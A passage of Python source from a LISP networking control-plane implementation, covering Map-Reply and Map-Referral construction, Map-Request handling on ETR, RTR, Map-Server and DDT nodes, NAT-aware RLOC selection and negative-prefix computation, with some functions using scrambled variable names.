    packet += eid_record.encode()
    eid_record.print_record("  ", False)

    local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()

    probe_rloc = None
    for rloc_entry in rloc_set:
        multicast = rloc_entry.rloc.is_multicast_address()
        rloc_record = lisp_rloc_record()
        probe_bit = rloc_probe and (multicast or json_telemetry == None)
        address_str = rloc_entry.rloc.print_address_no_iid()
        if (address_str in local_rlocs or multicast):
            rloc_record.local_bit = True
            rloc_record.probe_bit = probe_bit
            rloc_record.keys = keys
            if (rloc_entry.priority == 254 and lisp_i_am_rtr):
                rloc_record.rloc_name = "RTR"

            if (probe_rloc == None): probe_rloc = rloc_entry.rloc

        rloc_record.store_rloc_entry(rloc_entry)
        rloc_record.reach_bit = True
        rloc_record.print_record("    ")
        packet += rloc_record.encode()

    #
    # Append a telemetry RLOC-record when the Map-Request asked for one.
    #
    if (json_telemetry != None):
        rloc_record = lisp_rloc_record()
        if (probe_rloc): rloc_record.rloc.copy_address(probe_rloc)
        rloc_record.local_bit = True
        rloc_record.probe_bit = True
        rloc_record.reach_bit = True
        if (lisp_i_am_rtr):
            rloc_record.priority = 254
            rloc_record.rloc_name = "RTR"

        telemetry = lisp_encode_telemetry(json_telemetry,
            eo=str(time.time()))
        rloc_record.json = lisp_json("telemetry", telemetry)
        rloc_record.print_record("    ")
        packet += rloc_record.encode()

    return (packet)
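
#
# Illustrative sketch (hypothetical helper, never called): the first 32-bit
# word of the Map-Reply built above carries the message type in the top 4
# bits and the record count in the low bits, mirroring the Map-Notify
# header built in lisp_convert_reply_to_notify() later in this file.
#
def _example_map_reply_first_long(record_count):
    first_long = (LISP_MAP_REPLY << 28) | record_count
    return struct.pack("I", socket.htonl(first_long))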

#
# lisp_build_map_referral
#
# Build a Map-Referral with one EID-record and one RLOC-record per node in
# the DDT delegation set.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
    map_referral = lisp_map_referral()
    map_referral.record_count = 1
    map_referral.nonce = nonce
    packet = map_referral.encode()
    map_referral.print_map_referral()

    eid_record = lisp_eid_record()

    rloc_count = 0
    if (ddt_entry == None):
        eid_record.eid = eid
        eid_record.group = group
    else:
        rloc_count = len(ddt_entry.delegation_set)
        eid_record.eid = ddt_entry.eid
        eid_record.group = ddt_entry.group
        ddt_entry.map_referrals_sent += 1

    eid_record.rloc_count = rloc_count
    eid_record.authoritative = True

    #
    # Choose the referral action from the first delegation entry when the
    # caller did not supply one.
    #
    incomplete = False
    if (action == LISP_DDT_ACTION_NULL):
        if (rloc_count == 0):
            action = LISP_DDT_ACTION_NODE_REFERRAL
        else:
            ddt_node = ddt_entry.delegation_set[0]
            if (ddt_node.is_ddt_child()):
                action = LISP_DDT_ACTION_NODE_REFERRAL
            if (ddt_node.is_ms_child()):
                action = LISP_DDT_ACTION_MS_REFERRAL

    #
    # Mark the referral incomplete when not authoritative, or when a
    # Map-Server answers for a delegation that is not an ms-peer.
    #
    if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
    if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
        incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)

    eid_record.action = action
    eid_record.ddt_incomplete = incomplete
    eid_record.record_ttl = ttl

    packet += eid_record.encode()
    eid_record.print_record("  ", True)

    if (rloc_count == 0): return (packet)

    for ddt_node in ddt_entry.delegation_set:
        rloc_record = lisp_rloc_record()
        rloc_record.rloc = ddt_node.delegate_address
        rloc_record.priority = ddt_node.priority
        rloc_record.weight = ddt_node.weight
        rloc_record.mpriority = 255
        rloc_record.mweight = 0
        rloc_record.reach_bit = True
        packet += rloc_record.encode()
        rloc_record.print_record("    ")

    return (packet)

#
# lisp_etr_process_map_request
#
# ETR processing of a Map-Request (usually an RLOC-probe): look up the EID
# in the local database-mappings and return a Map-Reply.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
    ttl, etr_in_ts):

    if (map_request.target_group.is_null()):
        db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
    else:
        db = lisp_db_for_lookups.lookup_cache(map_request.target_group,
            False)
        if (db): db = db.lookup_source_cache(map_request.target_eid, False)

    eid_str = map_request.print_prefix()

    if (db == None):
        lprint("Database-mapping entry not found for requested EID {}". \
            format(green(eid_str, False)))
        return

    db_str = db.print_eid_tuple()

    lprint("Found database-mapping EID-prefix {} for requested EID {}". \
        format(green(db_str, False), green(eid_str, False)))

    #
    # Reply to the first ITR-RLOC; when it is behind a NAT, reply to the
    # outer source address instead.
    #
    itr_rloc = map_request.itr_rlocs[0]
    if (itr_rloc.is_private_address() and lisp_nat_traversal):
        itr_rloc = source

    nonce = map_request.nonce
    enc = lisp_nonce_echoing
    keys = map_request.keys

    #
    # Timestamp telemetry on the way in when the request carries it.
    #
    telemetry = map_request.json_telemetry
    if (telemetry != None):
        map_request.json_telemetry = lisp_encode_telemetry(telemetry,
            ei=etr_in_ts)

    db.map_replies_sent += 1

    packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
        LISP_NO_ACTION, 1440, map_request, keys, enc, True, ttl)

    #
    # An RLOC-probe reply from an xTR behind a NAT must be encapsulated to
    # the RTR so it traverses the NAT state.
    #
    if (map_request.rloc_probe and len(lisp_sockets) == 4):
        public = (itr_rloc.is_private_address() == False)
        address_str = itr_rloc.print_address_no_iid()
        if (public and address_str in lisp_rtr_list or sport == 0):
            lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
            return

    lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
    return

#
# lisp_rtr_process_map_request
#
# RTR processing of a Map-Request: reply with this RTR's own RLOCs at
# priority 254.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
    ttl, etr_in_ts):

    #
    # Reply to the first ITR-RLOC, or to the outer source when the
    # ITR-RLOC is a private address.
    #
    itr_rloc = map_request.itr_rlocs[0]
    if (itr_rloc.is_private_address()): itr_rloc = source
    nonce = map_request.nonce

    eid = map_request.target_eid
    group = map_request.target_group

    rloc_set = []
    for address in [lisp_myrlocs[0], lisp_myrlocs[1]]:
        if (address == None): continue
        rloc = lisp_rloc()
        rloc.rloc.copy_address(address)
        rloc.priority = 254
        rloc_set.append(rloc)

    enc = lisp_nonce_echoing
    keys = map_request.keys

    telemetry = map_request.json_telemetry
    if (telemetry != None):
        map_request.json_telemetry = lisp_encode_telemetry(telemetry,
            ei=etr_in_ts)

    packet = lisp_build_map_reply(eid, group, rloc_set, nonce,
        LISP_NO_ACTION, 1440, map_request, keys, enc, True, ttl)
    lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
    return

#
# lisp_get_private_rloc_set
#
# When two sites register to the same Map-Server from behind the same NAT
# (same public RLOC, or same configured site-id), return the target site's
# private RLOCs so the sites can reach each other directly.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
    rloc_set = target_site_eid.registered_rlocs

    source_site_eid = lisp_site_eid_lookup(seid, group, False)
    if (source_site_eid == None): return (rloc_set)

    #
    # Collect the target site's private RLOCs and find its public RLOC.
    #
    target_rloc = None
    private_rlocs = []
    for rloc_entry in rloc_set:
        if (rloc_entry.is_rtr()): continue
        if (rloc_entry.rloc.is_private_address()):
            private_rloc = copy.deepcopy(rloc_entry)
            private_rlocs.append(private_rloc)
            continue

        target_rloc = rloc_entry
        break

    if (target_rloc == None): return (rloc_set)
    target_rloc = target_rloc.rloc.print_address_no_iid()

    #
    # Find the source site's public RLOC.
    #
    source_rloc = None
    for rloc_entry in source_site_eid.registered_rlocs:
        if (rloc_entry.is_rtr()): continue
        if (rloc_entry.rloc.is_private_address()): continue
        source_rloc = rloc_entry
        break

    if (source_rloc == None): return (rloc_set)
    source_rloc = source_rloc.rloc.print_address_no_iid()

    #
    # With no site-id configured, compare public RLOCs; the same address
    # on both sides means both sites sit behind the same NAT.
    #
    site_id = target_site_eid.site_id
    if (site_id == 0):
        if (source_rloc == target_rloc):
            lprint("Return private RLOCs for sites behind {}".format(
                target_rloc))
            return (private_rlocs)
        return (rloc_set)

    #
    # When site-ids are configured, compare them instead.
    #
    if (site_id == source_site_eid.site_id):
        lprint("Return private RLOCs for sites in site-id {}".format(
            site_id))
        return (private_rlocs)
    return (rloc_set)

#
# lisp_get_partial_rloc_set
#
# Return the subset of a registered RLOC-set a requester should see. RLOCs
# registered with priority 254 are RTRs fronting a NATed site: an RTR
# asking gets the site's own RLOCs, while an ITR asking gets the RTR
# RLOCs plus any IPv6 or private site RLOCs it may reach directly.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
    rtr_list = []
    rloc_set = []

    #
    # Determine if the requester is itself one of the registered RTRs.
    #
    rtr_is_source = False
    behind_nat = False
    for rloc_entry in registered_rloc_set:
        if (rloc_entry.priority != 254): continue
        behind_nat |= True
        if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
        rtr_is_source = True
        break

    #
    # No RTRs registered means the site is not behind a NAT; return the
    # full set.
    #
    if (behind_nat == False): return (registered_rloc_set)

    #
    # An RTR that is itself behind a NAT can be told, via the
    # LISP_RTR_BEHIND_NAT environment variable, to omit private RLOCs.
    #
    rtr_behind_nat = (os.getenv("LISP_RTR_BEHIND_NAT") != None)

    #
    # Split the registered set into RTR RLOCs and site RLOCs.
    #
    for rloc_entry in registered_rloc_set:
        if (rtr_behind_nat and rloc_entry.rloc.is_private_address()):
            continue
        if (multicast == False and rloc_entry.priority == 255): continue
        if (multicast and rloc_entry.mpriority == 255): continue
        if (rloc_entry.priority == 254):
            rtr_list.append(rloc_entry)
        else:
            rloc_set.append(rloc_entry)

    #
    # The RTR gets the site's own RLOCs.
    #
    if (rtr_is_source): return (rloc_set)

    #
    # An ITR gets the RTR RLOCs plus any IPv6 or private site RLOCs.
    #
    rloc_set = []
    for rloc_entry in registered_rloc_set:
        if (rloc_entry.rloc.is_ipv6()): rloc_set.append(rloc_entry)
        if (rloc_entry.rloc.is_private_address()):
            rloc_set.append(rloc_entry)

    rloc_set += rtr_list
    return (rloc_set)
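
#
# Illustrative example of the selection above, with hypothetical values: a
# site behind a NAT registers [RTR (priority 254), 10.0.0.2 (private),
# 192.0.2.1 (public)]. An ITR sending a Map-Request is returned
# [10.0.0.2, RTR], while the RTR itself is returned [10.0.0.2, 192.0.2.1]
# so it can encapsulate to the site directly.
#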

#
# lisp_store_pubsub_state
#
# Remember a subscription request so later changes to the EID-prefix
# trigger Map-Notify messages to the subscriber.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl,
    xtr_id):
    pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
    pubsub.add(reply_eid)
    return (pubsub)

#
# lisp_convert_reply_to_notify
#
# Turn a Map-Reply into a Map-Notify: keep the record count and nonce,
# replace the header type, and insert a zeroed authentication field.
#
def lisp_convert_reply_to_notify(packet):
    record_count = struct.unpack("I", packet[0:4])[0]
    record_count = socket.ntohl(record_count) & 0xff
    nonce = packet[4:12]
    packet = packet[12::]

    first_long = (LISP_MAP_NOTIFY << 28) | record_count
    header = struct.pack("I", socket.htonl(first_long))
    auth = struct.pack("I", 0)

    packet = header + nonce + auth + packet
    return (packet)
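
#
# Illustrative sketch (hypothetical helper and values, never called): a
# Map-Reply header with one record becomes a Map-Notify header carrying
# the same record count and nonce.
#
def _example_reply_to_notify_header():
    reply = struct.pack("I", socket.htonl((LISP_MAP_REPLY << 28) | 1))
    reply += b"\x11" * 8  # 64-bit nonce
    notify = lisp_convert_reply_to_notify(reply)
    assert struct.unpack("I", notify[0:4])[0] == \
        socket.htonl((LISP_MAP_NOTIFY << 28) | 1)
    assert notify[4:12] == b"\x11" * 8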

#
# lisp_notify_subscribers
#
# Send a Map-Notify to every subscriber whose subscribed prefix covers the
# EID-prefix that just registered.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, rloc_records,
    registered_eid, site):

    for eid_str in lisp_pubsub_cache:
        for pubsub in list(lisp_pubsub_cache[eid_str].values()):
            eid_prefix = pubsub.eid_prefix
            if (eid_prefix.is_more_specific(registered_eid) == False):
                continue

            itr = pubsub.itr
            port = pubsub.port
            itr_str = red(itr.print_address_no_iid(), False)
            sub_str = bold("subscriber", False)
            xtr_id_str = "0x" + lisp_hex_string(pubsub.xtr_id)
            nonce_str = "0x" + lisp_hex_string(pubsub.nonce)

            lprint("    Notify {} {}:{} xtr-id {} for {}, nonce {}".format(
                sub_str, itr_str, port, xtr_id_str, green(eid_str, False),
                nonce_str))

            #
            # Rewrite the record's EID to the subscribed prefix before
            # building the Map-Notify.
            #
            record = copy.deepcopy(eid_record)
            record.eid.copy_address(eid_prefix)
            record = record.encode() + rloc_records
            lisp_build_map_notify(lisp_sockets, record, [eid_str], 1, itr,
                port, pubsub.nonce, 0, 0, 0, site, False)

            pubsub.map_notify_count += 1
    return

#
# lisp_process_pubsub
#
# Store subscription state and ack it by turning the already-built
# Map-Reply into a Map-Notify sent back to the subscribing ITR.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port,
    nonce, ttl, xtr_id):

    pubsub = lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl,
        xtr_id)

    eid = green(reply_eid.print_prefix(), False)
    itr = red(itr_rloc.print_address_no_iid(), False)
    map_notify = bold("Map-Notify", False)
    xtr_id_str = "0x" + lisp_hex_string(xtr_id)
    lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(
        map_notify, eid, itr, xtr_id_str))

    packet = lisp_convert_reply_to_notify(packet)
    lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
    pubsub.map_notify_count += 1
    return

#
# lisp_ms_process_map_request
#
# Map-Server processing of a Map-Request: verify any signature, look up
# the requested EID in the site cache, then either proxy-reply or forward
# the request to one of the site's registered ETRs.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
    mr_sport, ecm_source):

    eid = map_request.target_eid
    group = map_request.target_group
    eid_str = lisp_print_eid_tuple(eid, group)
    itr_rloc = map_request.itr_rlocs[0]
    xtr_id = map_request.xtr_id
    nonce = map_request.nonce
    action = LISP_NO_ACTION
    pubsub = map_request.subscribe_bit

    #
    # Verify the Map-Request signature when the EID is a crypto-hash EID.
    #
    sig_good = True
    is_hash_eid = (lisp_get_eid_hash(eid) != None)
    if (is_hash_eid):
        sig = map_request.map_request_signature
        if (sig == None):
            sig_good = False
            lprint(("EID-crypto-hash signature verification {}, " + \
                "no signature found").format(bold("failed", False)))
        else:
            sig_eid = map_request.signature_eid
            hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
            if (sig_good):
                sig_good = map_request.verify_map_request_sig(pubkey)
            else:
                lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
                    format(sig_eid.print_address(),
                    hash_eid.print_address()))

            status = bold("passed", False) if sig_good else bold("failed",
                False)
            lprint("EID-crypto-hash signature verification {}".format(
                status))

    if (pubsub and sig_good == False):
        pubsub = False
        lprint("Suppress creating pubsub state due to signature failure")

    #
    # Reply to the inner ITR-RLOC when its address family matches the
    # outer ECM source; otherwise reply to the ECM source.
    #
    reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source

    site_eid = lisp_site_eid_lookup(eid, group, False)

    if (site_eid == None or site_eid.is_star_g()):
        not_found = bold("Site not found", False)
        lprint("{} for requested EID {}".format(not_found,
            green(eid_str, False)))

        #
        # No site configured; send a negative Map-Reply with a 15-minute
        # TTL.
        #
        lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce,
            itr_rloc, mr_sport, 15, xtr_id, pubsub)

        return ([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])

    site_eid_str = site_eid.print_eid_tuple()
    site_name = site_eid.site.site_name

    #
    # When the site requires signatures, verify even when the EID is not a
    # crypto-hash EID.
    #
    if (is_hash_eid == False and site_eid.require_signature):
        sig = map_request.map_request_signature
        sig_eid = map_request.signature_eid
        if (sig == None or sig_eid.is_null()):
            lprint("Signature required for site {}".format(site_name))
            sig_good = False
        else:
            sig_eid = map_request.signature_eid
            hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
            if (sig_good):
                sig_good = map_request.verify_map_request_sig(pubkey)
            else:
                lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
                    format(sig_eid.print_address(),
                    hash_eid.print_address()))

        status = bold("passed", False) if sig_good else bold("failed", False)
        lprint("Required signature verification {}".format(status))

    if (sig_good and site_eid.registered == False):
        lprint("Site '{}' with EID-prefix {} is not registered for EID {}".\
            format(site_name, green(site_eid_str, False),
            green(eid_str, False)))

        #
        # When more-specifics are not accepted, return the configured
        # prefix in the negative Map-Reply.
        #
        if (site_eid.accept_more_specifics == False):
            eid = site_eid.eid
            group = site_eid.group

        ttl = 1
        if (site_eid.force_ttl != None):
            ttl = site_eid.force_ttl | 0x80000000

        lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce,
            itr_rloc, mr_sport, ttl, xtr_id, pubsub)

        return ([eid, group, LISP_DDT_ACTION_MS_NOT_REG])

    #
    # Decide whether this Map-Server proxy-replies.
    #
    nat_forced = False
    reply_type = ""
    proxy_reply = False
    if (site_eid.force_nat_proxy_reply):
        reply_type = ", nat-forced"
        nat_forced = True
        proxy_reply = True
    elif (site_eid.force_proxy_reply):
        reply_type = ", forced"
        proxy_reply = True
    elif (site_eid.proxy_reply_requested):
        reply_type = ", requested"
        proxy_reply = True
    elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
        reply_type = ", drop-to-pitr"
        action = LISP_DROP_ACTION
    elif (site_eid.proxy_reply_action != ""):
        action = site_eid.proxy_reply_action
        reply_type = ", forced, action {}".format(action)
        action = LISP_DROP_ACTION if (action == "drop") else \
            LISP_NATIVE_FORWARD_ACTION

    #
    # Apply any policy configured for the site.
    #
    policy_drop = False
    policy = None
    if (proxy_reply and site_eid.policy in lisp_policies):
        p = lisp_policies[site_eid.policy]
        if (p.match_policy_map_request(map_request, mr_source)): policy = p

        if (policy):
            matched = bold("matched", False)
            lprint("Map-Request {} policy '{}', set-action '{}'".format(
                matched, p.policy_name, p.set_action))
        else:
            matched = bold("no match", False)
            lprint("Map-Request {} for policy '{}', implied drop".format(
                matched, p.policy_name))
            policy_drop = True

    if (reply_type != ""):
        lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}".\
            format(green(eid_str, False), site_name,
            green(site_eid_str, False), reply_type))

        rloc_set = site_eid.registered_rlocs
        ttl = 1440
        if (nat_forced):
            if (site_eid.site_id != 0):
                source_eid = map_request.source_eid
                rloc_set = lisp_get_private_rloc_set(site_eid, source_eid,
                    group)
            if (rloc_set == site_eid.registered_rlocs):
                is_multicast = (site_eid.group.is_null() == False)
                new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest,
                    is_multicast)
                if (new_set != rloc_set):
                    ttl = 15
                    rloc_set = new_set

        #
        # A configured force-ttl overrides the record TTL.
        #
        if (site_eid.force_ttl != None):
            ttl = site_eid.force_ttl | 0x80000000

        #
        # Policy can override the record TTL and the RLOC-set.
        #
        if (policy):
            if (policy.set_record_ttl):
                ttl = policy.set_record_ttl
                lprint("Policy set-record-ttl to {}".format(ttl))
            if (policy.set_action == "drop"):
                lprint("Policy set-action drop, send negative Map-Reply")
                action = LISP_POLICY_DENIED_ACTION
                rloc_set = []
            else:
                rloc = policy.set_policy_map_reply()
                if (rloc): rloc_set = [rloc]

        if (policy_drop):
            lprint("Implied drop action, send negative Map-Reply")
            action = LISP_POLICY_DENIED_ACTION
            rloc_set = []

        enc = site_eid.echo_nonce_capable

        #
        # On signature failure, return a negative Map-Reply with an
        # auth-failure action.
        #
        if (sig_good):
            reply_eid = site_eid.eid
            reply_group = site_eid.group
        else:
            reply_eid = eid
            reply_group = group
            action = LISP_AUTH_FAILURE_ACTION
            rloc_set = []

        #
        # For subscription requests, echo the requested prefix.
        #
        if (pubsub):
            reply_eid = eid
            reply_group = group

        packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
            nonce, action, ttl, map_request, None, enc, False)

        if (pubsub):
            lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
                mr_sport, nonce, ttl, xtr_id)
        else:
            lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)

        return ([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])

    #
    # Not proxy-replying; forward the Map-Request to one of the site's
    # registered ETRs.
    #
    rloc_count = len(site_eid.registered_rlocs)
    if (rloc_count == 0):
        lprint(("Requested EID {} found site '{}' with EID-prefix {} with " + \
            "no registered RLOCs").format(green(eid_str, False), site_name,
            green(site_eid_str, False)))
        return ([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])

    #
    # Hash the source/target EID pair to select an ETR.
    #
    hash_source = map_request.target_eid if \
        map_request.source_eid.is_null() else map_request.source_eid

    hash_value = map_request.target_eid.hash_address(hash_source)
    hash_value %= rloc_count
    etr = site_eid.registered_rlocs[hash_value]

    if (etr.rloc.is_null()):
        lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
            "EID-prefix {}, no RLOC address").format(green(eid_str, False),
            site_name, green(site_eid_str, False)))
    else:
        lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
            "EID-prefix {}").format(green(eid_str, False),
            red(etr.rloc.print_address(), False), site_name,
            green(site_eid_str, False)))

        #
        # Send the Map-Request inside an ECM to the selected ETR.
        #
        lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
            map_request.target_eid, etr.rloc, to_etr=True)

    return ([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
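
#
# lisp_ddt_process_map_request
#
# Process a Map-Request on a DDT node (or on a Map-Server handling a DDT
# request). Look up the target EID in the site or DDT caches, choose a
# referral action and record TTL, and return a Map-Referral to the ECM
# source.
#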
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):

    I11I = map_request.target_eid
    o0o0o = map_request.target_group
    iIiI1I1ii1I1 = lisp_print_eid_tuple(I11I, o0o0o)
    OOO0O0O = map_request.nonce
    oOoO0OooO0O = LISP_DDT_ACTION_NULL

    IIi1Ii1i11i = None
    if (lisp_i_am_ms):
        i1iI11i = lisp_site_eid_lookup(I11I, o0o0o, False)
        if (i1iI11i == None): return

        if (i1iI11i.registered):
            oOoO0OooO0O = LISP_DDT_ACTION_MS_ACK
            O0O00O = 1440
        else:
            I11I, o0o0o, oOoO0OooO0O = lisp_ms_compute_neg_prefix(I11I,
                o0o0o)
            oOoO0OooO0O = LISP_DDT_ACTION_MS_NOT_REG
            O0O00O = 1
    else:
        IIi1Ii1i11i = lisp_ddt_cache_lookup(I11I, o0o0o, False)
        if (IIi1Ii1i11i == None):
            oOoO0OooO0O = LISP_DDT_ACTION_NOT_AUTH
            O0O00O = 0
            lprint("DDT delegation entry not found for EID {}".format(
                green(iIiI1I1ii1I1, False)))
        elif (IIi1Ii1i11i.is_auth_prefix()):
            oOoO0OooO0O = LISP_DDT_ACTION_DELEGATION_HOLE
            O0O00O = 15
            iiiII1 = IIi1Ii1i11i.print_eid_tuple()
            lprint(("DDT delegation entry not found but auth-prefix {} " +
                "found for EID {}").format(iiiII1,
                green(iIiI1I1ii1I1, False)))

            if (o0o0o.is_null()):
                I11I = lisp_ddt_compute_neg_prefix(I11I, IIi1Ii1i11i,
                    lisp_ddt_cache)
            else:
                o0o0o = lisp_ddt_compute_neg_prefix(o0o0o, IIi1Ii1i11i,
                    lisp_ddt_cache)
                I11I = lisp_ddt_compute_neg_prefix(I11I, IIi1Ii1i11i,
                    IIi1Ii1i11i.source_cache)
            IIi1Ii1i11i = None
        else:
            iiiII1 = IIi1Ii1i11i.print_eid_tuple()
            lprint("DDT delegation entry {} found for EID {}".format(
                iiiII1, green(iIiI1I1ii1I1, False)))
            O0O00O = 1440

    OO0Oo00OO0oo = lisp_build_map_referral(I11I, o0o0o, IIi1Ii1i11i,
        oOoO0OooO0O, O0O00O, OOO0O0O)
    OOO0O0O = map_request.nonce >> 32
    if (map_request.nonce != 0 and OOO0O0O != 0xdfdf0e1d):
        port = LISP_CTRL_PORT
    lisp_send_map_referral(lisp_sockets, OO0Oo00OO0oo, ecm_source, port)
    return
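
#
# lisp_find_negative_mask_len
#
# Scan from the high-order bit for the first bit where 'eid' and
# 'entry_prefix' differ (hash_address() appears to XOR the two addresses)
# and widen neg_prefix.mask_len to that bit position if it is larger.
#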
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
    I11I1 = eid.hash_address(entry_prefix)
    iIi1I = eid.addr_length() * 8
    ooOoO00 = 0

    for ooOoO00 in range(iIi1I):
        o0ooo0o0Oo = 1 << (iIi1I - ooOoO00 - 1)
        if (I11I1 & o0ooo0o0Oo): break

    if (ooOoO00 > neg_prefix.mask_len): neg_prefix.mask_len = ooOoO00
    return
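
#
# lisp_neg_prefix_walk
#
# walk_cache() callback used by the negative-prefix computations. Entries
# in a different instance-ID or AFI (or ones not more-specific than the
# auth-prefix) are skipped; all others tighten the negative prefix via
# lisp_find_negative_mask_len().
#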
def lisp_neg_prefix_walk(entry, parms):
    I11I, iiiI1I, i1iI1II = parms

    if (iiiI1I == None):
        if (entry.eid.instance_id != I11I.instance_id):
            return([True, parms])
        if (entry.eid.afi != I11I.afi): return([True, parms])
    else:
        if (entry.eid.is_more_specific(iiiI1I) == False):
            return([True, parms])

    lisp_find_negative_mask_len(I11I, entry.eid, i1iI1II)
    return([True, parms])
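
#
# lisp_ddt_compute_neg_prefix
#
# Compute the least-specific prefix covering 'eid' that does not overlap
# any entry in the supplied cache. Non-binary EIDs (e.g. distinguished
# names) are returned unchanged.
#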
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):

    if (eid.is_binary() == False): return(eid)

    i1iI1II = lisp_address(eid.afi, "", 0, 0)
    i1iI1II.copy_address(eid)
    i1iI1II.mask_len = 0

    OoiI = ddt_entry.print_eid_tuple()
    iiiI1I = ddt_entry.eid

    eid, iiiI1I, i1iI1II = cache.walk_cache(lisp_neg_prefix_walk,
        (eid, iiiI1I, i1iI1II))

    i1iI1II.mask_address(i1iI1II.mask_len)

    lprint(("Least specific prefix computed from ddt-cache for EID {} " +
        "using auth-prefix {} is {}").format(green(eid.print_address(),
        False), OoiI, i1iI1II.print_prefix()))
    return(i1iI1II)
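
#
# lisp_ms_compute_neg_prefix
#
# Map-Server variant of the negative-prefix computation, handling both the
# unicast EID and the (S,G) group case. Returns [neg-eid, neg-group,
# action], where the action is DELEGATION_HOLE when an auth-prefix covers
# the request and NOT_AUTH otherwise.
#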
def lisp_ms_compute_neg_prefix(eid, group):
    i1iI1II = lisp_address(eid.afi, "", 0, 0)
    i1iI1II.copy_address(eid)
    i1iI1II.mask_len = 0
    Oo0O0ooo0o0O = lisp_address(group.afi, "", 0, 0)
    Oo0O0ooo0o0O.copy_address(group)
    Oo0O0ooo0o0O.mask_len = 0
    iiiI1I = None

    if (group.is_null()):
        IIi1Ii1i11i = lisp_ddt_cache.lookup_cache(eid, False)
        if (IIi1Ii1i11i == None):
            i1iI1II.mask_len = i1iI1II.host_mask_len()
            Oo0O0ooo0o0O.mask_len = Oo0O0ooo0o0O.host_mask_len()
            return([i1iI1II, Oo0O0ooo0o0O, LISP_DDT_ACTION_NOT_AUTH])

        IiiI1I1IiIIii = lisp_sites_by_eid
        if (IIi1Ii1i11i.is_auth_prefix()): iiiI1I = IIi1Ii1i11i.eid
    else:
        IIi1Ii1i11i = lisp_ddt_cache.lookup_cache(group, False)
        if (IIi1Ii1i11i == None):
            i1iI1II.mask_len = i1iI1II.host_mask_len()
            Oo0O0ooo0o0O.mask_len = Oo0O0ooo0o0O.host_mask_len()
            return([i1iI1II, Oo0O0ooo0o0O, LISP_DDT_ACTION_NOT_AUTH])

        if (IIi1Ii1i11i.is_auth_prefix()): iiiI1I = IIi1Ii1i11i.group

        group, iiiI1I, Oo0O0ooo0o0O = lisp_sites_by_eid.walk_cache(
            lisp_neg_prefix_walk, (group, iiiI1I, Oo0O0ooo0o0O))

        Oo0O0ooo0o0O.mask_address(Oo0O0ooo0o0O.mask_len)

        lprint(("Least specific prefix computed from site-cache for " +
            "group EID {} using auth-prefix {} is {}").format(
            group.print_address(),
            iiiI1I.print_prefix() if (iiiI1I != None) else "'not found'",
            Oo0O0ooo0o0O.print_prefix()))

        IiiI1I1IiIIii = IIi1Ii1i11i.source_cache

    oOoO0OooO0O = LISP_DDT_ACTION_DELEGATION_HOLE if (iiiI1I != None) else \
        LISP_DDT_ACTION_NOT_AUTH

    eid, iiiI1I, i1iI1II = IiiI1I1IiIIii.walk_cache(lisp_neg_prefix_walk,
        (eid, iiiI1I, i1iI1II))

    i1iI1II.mask_address(i1iI1II.mask_len)

    lprint(("Least specific prefix computed from site-cache for EID {} " +
        "using auth-prefix {} is {}").format(green(eid.print_address(),
        False),
        iiiI1I.print_prefix() if (iiiI1I != None) else "'not found'",
        i1iI1II.print_prefix()))

    return([i1iI1II, Oo0O0ooo0o0O, oOoO0OooO0O])
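
#
# lisp_ms_send_map_referral
#
# Build and send a Map-Referral from a Map-Server: pick the record TTL
# from 'action', encode one EID-record plus one RLOC-record per delegation
# in the DDT cache entry, and send the result to the ECM source.
#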
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
    action, eid_prefix, group_prefix):

    I11I = map_request.target_eid
    o0o0o = map_request.target_group
    OOO0O0O = map_request.nonce

    if (action == LISP_DDT_ACTION_MS_ACK): O0O00O = 1440

    oO00oO0o = lisp_map_referral()
    oO00oO0o.record_count = 1
    oO00oO0o.nonce = OOO0O0O
    OO0Oo00OO0oo = oO00oO0o.encode()
    oO00oO0o.print_map_referral()

